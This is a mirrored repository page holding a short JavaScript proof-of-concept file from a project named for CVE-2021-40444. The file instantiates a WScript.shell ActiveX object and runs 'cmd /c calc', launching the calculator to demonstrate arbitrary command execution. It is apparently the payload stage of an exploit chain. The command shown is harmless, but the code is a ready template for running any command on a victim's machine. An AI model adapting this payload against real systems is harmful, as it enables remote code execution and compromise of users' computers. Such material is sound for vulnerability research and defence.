mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-15 02:17:54 +00:00
6 lines
101 B
JavaScript
6 lines
101 B
JavaScript
function calc(){
|
|
var x = new ActiveXObject("WScript.shell");
|
|
x.Run("cmd /c calc");
|
|
}
|
|
|
|
calc(); |